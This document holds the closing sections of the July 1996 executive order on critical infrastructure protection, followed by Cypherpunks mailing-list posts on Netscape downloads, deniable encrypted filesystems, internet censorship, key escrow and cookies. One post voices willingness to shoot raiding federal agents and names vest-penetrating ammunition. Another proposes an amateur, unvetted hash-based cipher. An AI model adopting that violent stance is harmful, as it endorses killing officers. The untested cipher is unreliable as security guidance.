 shall advise the Commission on the subjects of the Commission's mission in
 whatever manner the Advisory Committee, the Commission Chair, and the
 Steering Committee deem appropriate.
      (b) A Chair shall be designated by the President from among the
 members of the Advisory Committee.
      (c) The Advisory Committee shall be established in compliance with
 the Federal Advisory Committee Act, as amended (5 U.S.C. App.).  The
 Department of Defense shall perform the functions of the President under
 the Federal Advisory Committee Act for the Advisory Committee, except that
 of reporting to the Congress, in accordance with the guidelines and
 procedures established by the Administrator of General Services.
      Sec. 6.  Administration.  (a) All executive departments and agencies
 shall cooperate with the Commission and provide such assistance,
 information, and advice to the Commission as it may request, to the extent
 permitted by law.
      (b) The Commission and the Advisory Committee may hold open and
 closed hearings, conduct inquiries, and establish subcommittees, as
 necessary.
      (c) Members of the Advisory Committee shall serve without
 compensation for their work on the Advisory Committee.  While engaged in
 the work of the Advisory Committee, members may be allowed travel
 expenses, including per diem in lieu of subsistence, as authorized by law
 for persons serving intermittently in the government service.
      (d) To the extent permitted by law, and subject to the availability
 of appropriations, the Department of Defense shall provide the Commission
 and the Advisory Committee with administrative services, staff, other
 support services, and such funds as may be necessary for the performance
 of its functions and shall reimburse the executive branch components that
 provide representatives to the Commission for the compensation of those
 representatives.
      (e) In order to augment the expertise of the Commission, the
 Department of Defense may, at the Commission's request, contract for the
 services of nongovernmental consultants who may prepare analyses, reports,
 background papers, and other materials for consideration by the
 Commission.  In addition, at the Commission's request, executive
 departments and agencies shall request that existing Federal advisory
 committees consider and provide advice on issue sof critical
 infrastructure protection, to the extent permitted by law.
      (f) The Commission, the Principals Committee, the Steering Committee,
 and the Advisory Committee shall terminate 1 year from the date of this
 order, unless extended by the President prior to this date.

      Sec. 7.  Interim Coordinating Mission.  (a) While the Commission is
 conducting its analysis and until the President has an opportunity to
 consider and act on its recommendations, there is a need to increase
 coordination of existing infrastructure protection efforts in order to
 better address, and prevent, crises that would have a debilitating
 regional or national impact.  There is hereby established an
 Infrastructure Protection Task Force ("IPTF") within the Department of
 Justice, chaired by the Federal Bureau of Investigation, to undertake this
 interim coordinating mission.
      (b) The IPTF will not supplant any existing programs or
 organizations.
      (c) The Steering Committee shall oversee the work of the IPTF.
      (d) The IPTF shall include at least one full-time member each from
 the Federal Bureau of Investigation, the Department of Defense, and the
 National Security Agency.  It shall also receive part-time assistance from
 other executive branch departments and agencies.  Members shall be
 designated by their departments or agencies on the basis of their
 expertise in the protection of critical infrastructures.  IPTF members'
 compensation shall be paid by their parent agency or department.
      (e) The IPTF's function is to identify and coordinate existing
 expertise, inside and outside of the Federal Government, to:
      (i)     provide, or facilitate and coordinate the provision of,
              expert guidance to critical infrastructures to detect,
              revent, halt, or confine an attack and to recover and restore
              service;
      (ii)    issue threat and warning notices in the event advance
              information is obtained about a threat;
      (iii)   provide training and education on methods of reducing
              vulnerabilities and responding to attacks on critical
              infrastructures;
      (iv)    conduct after-action analysis to determine possible future
              threats, targets, or methods of attack; and
      (v)     coordinate with the pertinent law enforcement authorities
              during or after an attack to facilitate any resulting
              criminal investigation.
      (f) All executive departments and agencies shall cooperate with the
 IPTF and provide such assistance, information, and advice as the IPTF
 may request, to the extent permitted by law.
      (g) All executive departments and agencies shall share with the IPTF
 information about threats and warning of attacks, and about actual attacks
 on critical infrastructures, to the extent permitted by law.
      (h) The IPTF shall terminate no later than 180 days after the
 termination of the Commission, unless extended by the President prior to
 that date.

      Sec. 8.  General.  (a) This order is not intended to change any
 existing statutes or Executive orders.
      (b) This order is not intended to create any right, benefit, trust,
 or responsibility, substantive or procedural, enforceable at law or equity
 by a party against the United States, its agencies, its officers, or any
 person.

                            (signed) William J. Clinton

 THE WHITE HOUSE
 July 15, 1996







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 18 Jul 1996 13:04:50 +0800
To: Yap Remailer <remailer@yap.pactitle.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <199607171835.LAA14321@yap.pactitle.com>
Message-ID: <31ED9B5A.167E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Yap Remailer wrote:
> 
> Have you heard any reports of anyone successfully downloading it
> period?  Netscape always times out in the middle of a download.  I
> think the server is so overloaded that it's actually impossible to
> download the software.
> 
> I sure wish there were an ftp site overseas somewhere, then I could
> actually get the damned thing.

Yes.  We've had a few thousand people download it.  Unfortunately, we
only have one machine serving downloads right now, and it tends to melt
down a couple times a day.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Thu, 18 Jul 1996 12:52:07 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <199607171835.LAA14321@yap.pactitle.com>
Message-ID: <199607180213.TAA12945@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Yap Remailer <remailer@yap.pactitle.com> writes:
>Have you heard any reports of anyone successfully downloading it
>period?  Netscape always times out in the middle of a download.  I
>think the server is so overloaded that it's actually impossible to
>download the software.

Yes, I successfully d/l'ed the Sun version.  I think it was about 7MB
and took forever, but it unpacked and ran cleanly with no glitches
whatever.  It's a temporary version -- it'll expire on about 17 Sep...
which is fine for me, since I didn't want to wait until our Purchasing
dept got through with their song and dance.

	Jim Gillogly
	Hevensday, 25 Afterlithe S.R. 1996, 02:12




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EVERHART@Arisia.GCE.Com
Date: Thu, 18 Jul 1996 10:33:46 +0800
To: cypherpunks@toad.com
Subject: Making encoding out of an authentication cipher
Message-ID: <960717193622.5e@Arisia.GCE.Com>
MIME-Version: 1.0
Content-Type: text/plain


Had an interesting thought, maybe worth passing on for commentary.

(...since "authentication" ciphers are considered "harmless" by
those interested in spying on your info...)


Suppose you have a secure hash function H(msg) that delivers a random
long period set of hash bits for msg, which is computationally infeasible
to invert and such that the value of H(msg) depends very sensitively on
all bits of msg. These things are used for authentication and tend to be
all over the world.

Now suppose I have a key and apply the following transform, where "+"
will mean binary exclusive OR.

Cipher:
H(key) + M(1)	   = C(1)
H(key+M(1)) + M(2) = C(2)
H(key+M(2)) + M(3) = C(3)

and so on where M(n) is the message and C is the enciphered message.

Decipher:

H(key)      + C(1)  = M(1)
H(key+M(1)) + C(2)  = M(2)
H(key+M(2)) + C(3)  = M(3)

and so on.

If the hash function is cryptographically strong, is this or is this not
a strong cipher? Are there fast hash functions around?

Note that in doing disk encryption, one has also the disk block number
available, and even the offset in block, to be stuffed into the hash function
if one wants. In a serial message one has offset in message also. The only
piece of nontrivial software needed to implement it is the hash function
itself, which has been claimed to be useful only for authentication. If this
scheme is at all strong, the distinction is shown to be fairly useless.

I thought of this a couple days ago...thought I might ask if anyone knows
any of the answers. I do not, and am not knowledgeable in this area, save
VERY casually.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 18 Jul 1996 14:01:42 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Opiated file systems
In-Reply-To: <Pine.SCO.3.93.960716103725.10319B-100000@grctechs.va.grci.com>
Message-ID: <Pine.LNX.3.94.960717194528.8968A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jul 1996, Mark O. Aldrich wrote:

> One problem, however, would be how to keep the "decoy" data, accessible
> with only the ambush key, "fresh" in that it must undergo a certain amount
> of
> turbulence to appear real.  The two file systems would essentially have to
> mirror each other, one with the juicy bits and one with the decoy bits.
> It would seem to be practically impossible to just build two file systems
> as one would 'disappear' when only the ambush key was used.  Wouldn't it
> be sort of obvious that something was wrong if half the disk vanished?
> 

While you do have a valid point about the turbulance needed, I think you
could still make some reasonable enough errors on the fakefs. One could
simple have several "curropt I-node tables", and that would satisfy almost
anybody (the NSA doesn't do domestic work ;)

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMe1GlDAJap8fyDMVAQHUiwf/Tc1Oq8qxx6Q9T5r57RHaDIyDaANKkUas
1VvVR2eCMlfDQAvUAFbGELEErKRTQnb+JCF9QoCH/eLrAnFcKrk+4hbcONimongO
X3wTUn3PXhQSoF3XH7u9F13npo0cAWavmlJD+16uTFxtyzt211u/APuxHrT/9jWx
mgvQtgMwkqNJICSlIRHAL4pQJ6pe1cweR8t0UxpKy55WtQzsdyF2Yh3fYSDvyaaa
L3m9qaa2QBuuLpPr7Bd5iCGlsPiyv2lo73FF9biYiKOTbo1lIKX5Sy5ITJVBFmrM
tfw7ZCxoe281k0jyyO3524Vycd5VOBOfE0atgHfMClI/E7AH9v43FA==
=chgf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 13:52:58 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available---NOT
Message-ID: <ae12fa840b0210046602@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 AM 7/18/96, Tom Weinstein wrote:

>Yes.  We've had a few thousand people download it.  Unfortunately, we
>only have one machine serving downloads right now, and it tends to melt
>down a couple times a day.

I've tried four times, and each time has timed out. (That is, I've filled
out the Web form four times and tried n times each iteration...at least I
get to experiment with variations on my name and address each time :-})

I guess I'll have to connect to the Italian and/or Swedish sites again. Has
the software arrived there yet?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 20:48:52 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
Message-ID: <ae12fd2f0c021004065b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:01 PM 7/17/96, Dave Banisar wrote:
>If y'all have heard, Clinton signed an executive order 2 days ago creating a
>new panel to examine how to "protect" "critical" computer systems. The panel
>will be made of of the usual suspects with a non-govt person ($5.00 says it
>will be someone from one of those wonderfully independant companies like SAIC,
>MITRETEC, EDS, E-Systems).
>
>Needless to say, it looks an awful lot like NSDD-145 all over again with the
>panel recommending changes to the law to allo for greater coordination of LE,
>intell for govt computers and god knows what for non-govt computers.
>
>Anyway, the directive is now up on our site at
>http://www.epic.org/security/infowar/eo_cip.html

Thanks.

It's certainly beginning to look like "infowar" is the new
funding/legislation fount....I suggest it be given honorary status as a
"Horseman."

Winn Schwartau is running conferences, is talking about the imminent danger
of the nation's computer networks being knocked out (paraphrasing his
latest "Wired" item: "imagine your ATM network being knocked out and people
being unable to gain access to their money").

Schwartau is predicting/advocating a "fifth branch" of the military to deal
with the this threat. A cyberforce, as it were.

Color me skeptical, but I see this all as a lot of hype and fear-mongering.
Folks in the Pentagon, FBI, and NSA probably see it as a way to get more
funding, Folks in the consulting business probably see it as a way to crank
up the seminar prices and increase the number and frequency of "Information
Warfare" workshops and seminars.

And the anti-terrorism folks will use it to tighten up.

(Of course, tonight's explosion of the TWA 800 looks to be a bomb, from all
indications...this _could_ be the "Oklahoma II" incident that will trigger
more draconian surveillance legislation. Just a concern I have.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 20:34:59 +0800
To: cypherpunks@toad.com
Subject: The Orchid Ring of (Probable) Child Pornographers
Message-ID: <ae1300270d021004b90d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 7/17/96, John Young wrote:

>   "16 Indicted On Charges Of Internet Pornography."
>
>      Exon-Reno-ing into one of the more distant frontiers of
>      sexual crime, a Federal grand jury charged 16 people in
>      the US and abroad with joining in a pornography ring.
>      Its members shared homemade pictures, recounted their
>      sexual experiences with children and even chatted
>      electronically as two of the men molested a 10-year-old
>      girl. The case appeared likely to heighten concerns
>      about the spread of child pornography over the Internet.

This incident happened very near me, in Greenfield, California, near Salinas.

(No, I was not involved!)

Apparently the "Orchid Ring" (or "Orchid Club") was using a
password-protected system of some sort, according to an article in today's
"Mercury News." The Internet was used, but I don't know the details (e.g.,
whether IRC was used, ordinary e-mail, or some soft of "intranet" linking
the participants).

ObList Relevance: Even if they were not using PGP or the like, it is not a
leap to imagine the usefullness of crypto for such intranets.

It'll be interesting to see how this unfolds.

BTW, from the reports it appears likely that these were indeed "child
pornographers," not simple violators of the CDA. That is, full-fledged
Horsemen of the Infocalypse. As such, potentially powerful ammunition for
those who would like restrictions placed on crypto. (Especially if it turns
out that law enforcement learned of the Orchid Ring through non-encrypted
communications.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Jul 1996 15:11:30 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Code used by George Washington made available at last
Message-ID: <199607180408.VAA29434@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 7/16/96 -0700, Bill Stewart wrote:
>There's an AP article by Carl Hartman saying that historians now have
>access to a secret handwritten code used by George Washington and
>Marquis de Lafayette.  (It's a newspaper article that somebody
>across the train is reading; looks like today's SF Examiner...)

They probably declassified it a week ago, discovering that the "national 
security" excuse no longer appeared to apply.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 18 Jul 1996 12:29:45 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Gorelick's Urge
In-Reply-To: <199607171328.NAA23475@pipe6.t2.usa.pipeline.com>
Message-ID: <Pine.SV4.3.91.960717213335.9309H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Isn't it getting a little tiring, to see the Manhattan Project's name 
being compared to modern-day triumphs of mediocrity?

Didja ever notice, that in the wake of the movie _The French Connection_, 
there arose a whole genre of movies and TV show, which were thinly 
disguised frameworks for displaying a copycat "action" car chase?  This 
is the intellectual level that Ms Gorelick appears to have.

Someone ought to send this Jamie girl, a  copy of Feynman's autobiography.
Think she can learn from history?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 18 Jul 1996 15:53:57 +0800
To: cypherpunks@toad.com
Subject: Philippine government moves to block incoming net-porn
Message-ID: <Pine.3.89.9607172154.A18241-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 17 Jul 1996 21:44:36 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship
Subject: Philippine government moves to block incoming net-porn

The attached note appears to have been sent to all ISPs in the
Philippines. It asks them to report back on how they can "block entry of
pornographic materials through the INTERNET." Note how it equates 
censoring porn with preventing sex tourism.

General information about international net-censorship is at:
  http://www.cs.cmu.edu/~declan/international/
  http://www.eff.org/pub/Global/Singapore/

Thanks to David Sobel for forwarding this.

-Declan


===================================================


		REPUBLIC OF THE PHILIPPINES
		DEPARTMENT OF TRANSPORTATION AND COMMUNICATIONS
		NATIONAL TELECOMMUNICATIONS COMMISSION
		865 VIBAL BLDG., EDSA CORNER TIMES ST., Q. C.

15 July 1996

M E M O R A N D U M

TO: ALL REGISTERED VALUE ADDED SERVICES PROVIDERS
RE: REQUEST OF THE DEPARTMENT OF JUSTICE TO BAR OR BLOCK
    ENTRY OF PORNOGRAPHIC MATERIALS THROUGH THE INTERNET

The Special Committee for Children, constituted pursuant to E.O. 275 dated
14 September 1995, is tasked to ensure the special protection of children 
from all forms of neglect, abuse, cruelty, exploitation, discrimination and 
other conditions prejudicial to their development. Said Committee takes 
action on specific issues involving the implementation of the provisions of
R. A. 7610 which covers several areas of concern, among others, child 
prostitution and other sexual abuse; child trafficking; obscene publications
and indecent shows using children as performers or models; other acts of
neglect, abuse, cruelty or exploitation and other conditions predjudicial
to the child's development.

The Committee has raised the concern on the INTERNET being used as a very 
convenient medium for advertising sex tourism in the Philippines, with 
particular focus on the alleged availability of Filipino children for sexual
liaisons and entertainment. Some materials used in the network for the 
afformentioned puprose were given to this Commission.

Secretary Teofisto T. Guingona, Jr., Department of Justice, requested this
Commission to bar or block entry of pornographic materials through the 
INTERNET.

In view of this, you are requested to give your comments/position and 
suggestions on this matter, particularly on the possibility of barring or 
blocking pornographic materials through the INTERNET, and submit the same to 
this Commission by 18 July 1996 attention to Director Edgardo V. Cabarios,
CCAD at fax no. 921-7128.

Your cooperation and prompt action on this matter is greatly appreciated.

Signed
Simeon J. Kintanar
Commissioner







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 16:08:43 +0800
To: cypherpunks@toad.com
Subject: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <ae1308450f021004a134@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:12 AM 7/18/96, The Deviant wrote:

>I have several friends that this has happened to, and pretty much it goes
>like this... round 7:00 AM, when your just going to bed (well, some of us
>don't have jobs till nighttime.. thank god.), they knock down your doors
>and windows (yes, they do come through windows), and they take the
>equipment, disks, tv's, CD players (yes, i know somebody who had their CD
>player taken.  And a pile of CDs. Music ones even.), clock radios, pretty
>much everything electronic they can cary.  If you ever DO get any of it
>back, most likely it is not the same equipment, i.e. they coppied it all
>and kept the original.

I wonder when and how raids in the U.S. moved from the "Come out with your
hands up" verbal announcement (for the cases that needed more than a knock
on the door) to this blast-in-the-doors approach, where the raiders are
dressed in "tactical black" and are wearing black Nomex hoods and carrying
MP-5s and blast any "perp" who looks at them cross-eyed?

As people as diverse as Marine Colonel Jeff Cooper and Watergate felon G.
Gordon Liddy have noted, any black-clad "ninjas" entering a home at 4 a.m.
without clearly announcing themselves are asking for trouble. (Liddy got in
a lot of trouble for calling for "head shots" on rampaging BATFags.
Frankly, I'm not a good enough shot--especially in high-stress
situations--to make head shots with my H & K .45, so I can only hope to
make torso shots.)

It's a mark of what has gone wrong with this country that ordinary citizens
actually fear the midnight raids, the no-knock searches, the "threat
suppression" by ninjas.

(There are many cases where homeowners awoke to the sounds of crashing
doors and windows, reached for a nightstand gun, and were shot dead by the
"ninja" raiders. In some of these incidents, the raid was at the wrong
house, or the "suspicions" of drug or terror involvement were later shown
to be wrong. "Oops.")

Personally, I think all folks should be armed at all times in their homes.
Those who aren't are taking their chances. My personal choice is a Heckler
& Koch USP .45. loaded with Federal Golden Sabres, a hollowpoint round that
has a 92% one-shot stop rate, with adequate penetration through Kevlar
vests (typically worn by BATF raiders). I may die, but I hope I can take at
least two of them with me. (Interestingly, the same class of folks who want
to ban "military-grade crypto" are also seeking to ban Kevlar vest-piercing
rounds. Fortunately, though KTW ammo is no longer available to "marks" (=
civilians), .45 ACP +P does a pretty good job. Certain +P .357 Magnum
rounds are even better penetrators, but recoil and muzzle blast is pretty
severe with these loads.)

This may sound callous, even paranoid. I don't normally talk about such
things, but such raids are becoming increasingly common. (Check out the
case of the retired doctor in Malibu whose beachfront home was raided
without any warnings by the local cops. He reached for a gun and was
blasted with 9mm slugs. His wife survived. Turned out the County of L.A.
had hopes to seize his property in a drug "forfeiture" and sell it at great
profit. They suspected marijuana was being grown. No drugs, no plants, nada
was ever found. "Oops.")

(I expressed my views about being armed in a Usenet article last summer,
and received a "friendly phone call" from a Deputy Sheriff of Santa Cruz
County. (Someone who disliked my article faxed a copy of my article to the
Sheriff's Department.) When he asked me some questions to find out why I
was not trusting the police and "felt the need" to be armed, I got quite
forceful in my comments about the role of the Second Amendment. (I should
have just told him to fuck off, in retrospect. Anything volunteered to the
cops is usually a mistake.) He said he might "send a vehicle" out to my
ranch to "talk to me." I asked on what basis, on the basis of what criminal
charges? I also said I'd "be ready." He announced unctuously that my
"threat" had just been "logged" and would be considered in any future
criminal procedures. Needless to say, I got a lot more of my guns ready. So
far, a year later, they haven't raided me yet. Knock on wood. This country
has gone to the dogs.)

The fact is, the "War on Drugs" has tainted this country. Whatever one
thinks of drugs, the result of this War has been that cops are now
paramilatary in nature, that midnight raids have become much more common,
that both cops and citizens are now armed with more firepower than ever
before (I have more than 4000 rounds of ammo at my place, for my sniper
rifle, my (so-called) assault rifle, and my various handguns. Anyone inside
my house without an invitation is assumed to be a threat to me and will
face retaliation.)

Crypto is just another weapon to use to protect our liberty.

Sorry for the rant, but this recounting of pre-dawn raids on computer users
reminds me that the American political system will likely treat "rogue
computers users" the way it treats suspected drug dealers: break down the
doors, enter at dawn, kill anyone who moves, and let God sort out the
innocent.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 18 Jul 1996 12:50:07 +0800
To: bkmarsh@feist.com>
Subject: Re: Washington Post -- "Block but Verify"
In-Reply-To: <Pine.BSI.3.91.960717131852.10580A-100000@wichita.fn.net>
Message-ID: <clvNcLW00YUq14y_E0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Jul-96 Re: Washington Post --
"Blo.. by "Bruce M."@feist.com 
>     I thought that Net Nanny or another related product offered generic 
> options for what you wanted to block.  Such as clicking on an option box 
> to enable the blocking of violence or to enable the blocking of sexual 
> material.

Some products do, some don't. SurfWatch is ON or OFF. CyberPatrol has a
dozen categories.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@woodland.org>
Date: Thu, 18 Jul 1996 12:34:53 +0800
To: cypherpunks@toad.com
Subject: Re: Cookie alternatives
In-Reply-To: <199607161607.JAA08875@jobe.shell.portal.com>
Message-ID: <31ED8EFE.5A2C@woodland.org>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:

[Summary of the Cookie Situation, including an interesting proposal
about client-side shopping carts that could replace some uses of
cookies.]
 
> (Given the difficulties in creating new protocols for this kind of
> support, I think a step in the right direction would be to change the
> user interface so that cookies are only sent upon user request.  Maybe
> you have to shift-click or use some other key modifier to send a cookie.
> Then shopping pages could ask you to shift-click the buy button to add
> the item to your shopping cart.)

Neat idea, but it might be hard to get many users to understand the
interface.  I'm surprised no one's mentioned that this week's beta of
Netscape Navigator (3.0b5, available in U.S. or export strength) has a
configuration option that let's you see an alert box before your browser
accepts a cookie.  It's a little hard to find...  (Note to Jeff W. or
other Netscape folks:  maybe this should move from Network: Protocols to
Security: General.  Makes more sense to keep all the "Show an Alert
Before" choices in one place.)

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 18 Jul 1996 13:03:07 +0800
To: tc@mindvox.com>
Subject: Re: Intl consensus (was Re: How I Would Ban Strong Crypto in the U.S.)
In-Reply-To: <Pine.SOL.3.91.960717082516.6065A-100000@phantom>
Message-ID: <olvNpd_00YUq14y=80@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Jul-96 Intl consensus (was Re:
How.. by Dave Banisar@mindvox.com 
> BTW. Those wizards at Wired have gotten our favorite spook Stewart Baker 
> to write an article for an upcome issue talking about how the rest of the 
> world save Japan loves key escrow and those big bad Japanese are 
> thwarting the rest of the worlds "consensus". Its quite a load of 
> inaccurate shit but our effort to rebut it was rejected by wired (I guess 
> it wasnt trite enough for them).

Will anyone else be rebutting it?

-Declan
(not speaking for WIRED, first I heard of this)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 18 Jul 1996 12:53:15 +0800
To: vznuri@netcom.com>
Subject: Re: Surf-filter lists
In-Reply-To: <199607161804.LAA26399@netcom18.netcom.com>
Message-ID: <klvNtWK00YUq14yB40@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 16-Jul-96 Re: Surf-filter lists  by
"Vladimir Z. Nuri"@netco 
> Meeks discussed a case where the software clearly gave *categories*
> of what it filtered, and I think he focused on a case where it
> was clear that it was borderline (the monkey with the eye poked
> out). in other words, it did appear to me that the software &raters
> were working exactly as they were supposed to, and he was hilighting
> a borderline case. moreover, the categories were clear: "gratuitous
> depictions of violence" or whatever. for *some* consumers, knowledge
> of these *categories* is going to be enough. other consumers
> are going to be more wary and want to make sure that the actual
> sites blocked correspond to the categories stated.

L.D. fails to say why NOW and gay history sites and gun rights sites and
EFF and LPF and SAFE @ MIT and HotWired should be blocked. He also fails
to understand that Brock and I both wrote the article. He finally fails
to understand that CyberPatrol's categories are anything but clear.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Jul 1996 16:23:22 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: An interesting instance of poltical anonymnity, now revealed
Message-ID: <199607180522.WAA04203@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:09 PM 7/17/96 EDT, E. ALLEN SMITH wrote:
>	I find the CBS News response unfortunate. There's also the simple
>question on lying to maintain the identity: what's so bad about lying? Why
>he revealed himself is somewhat of lesson also.
>	-Allen
>
>   _ Wednesday July 17 9:12 PM EDT _
>   
>'Primary Colors' Author Steps Forward
>
>   NEW YORK (Reuter) - One of the best kept secrets in political,
>   journalistic and publishing circles was revealed Wednesday when
>   Newsweek journalist Joe Klein admitted he was ''Anonymous'', the
>   mysterious author of a novel based on President Clinton's 1992
>   presidential campaign.


If they really wanted to know who did it, why didn't they do a word analysis 
of the book, and compare it to known writers?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 17:03:19 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
In-Reply-To: <1.5.4.32.19960716230339.002d0458@giasdl01.vsnl.net.in>
Message-ID: <v03007603ae137f679382@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM -0700 7/16/96, Arun Mehta wrote:
>At 10:13 15/07/96 -0700, David Sternlight wrote:
>>actions in the Netherlands, the UK, and in the European
>>Parliament suggest that an independent European escrow initiative might
>>happen within a year. When it does it will be a trivial matter to harmonize
>>it with some US offering. The mills in various countries are grinding too
>>coincidentally for my taste.
>
>I don't doubt that the Europeans are quite likely to toe the American line --

Your comment is historically inaccurate. When "the Americans" came around
to Europe selling Clipper, most told them to go peddle their papers. Then
independent European escrow developments arose in a number of countries.
This is a European line if it is anything, since there is no mandatory
escrow requirement for domestic crypto in the US, nor has one reached the
advanced state of play it has in the UK, Netherlands, European parliament
(or is it the Council?), etc.

There is no "toeing the American line" in this matter except in the minds
of America-bashers.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Thu, 18 Jul 1996 16:45:35 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
Message-ID: <Pine.BSF.3.91.960717225344.678A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> But, on the other hand, it wouldn't be to hard to have the user set both
> keys (yeah, so that didn't actually say anything, so what...), and then do
> an every-other-byte type thing (although that would be slow... every other
> block would be more efficient), and have 2 EFS's in one file, and make it
> so that on the "duress" one the extra space appears to be "free".
> One could make it a real file system, and add a fake disk error to prevent
> over-writing of the "non-duress" filesystem.

This sounds a lot like security through obscurity... What happens when 
someone reverse-engineers the software and sees that it's carefully 
skipping over blocks?

If you don't want people to know about your encrypted data, use stego. 
Even if They find the stego software, you can always produce the keys to
unlock the duress data from two or three .gif files, and say "that's all
there is." 

Use stego to hide data. Use encrypted filesystems for convenience. If you
try to put the two together, you'll probably end up with feature-bloat.


The idea of an encrypted filesystems being accessable over the internet 
sounds interesting, though. Sort of a cross between NFS and CFS. Would be 
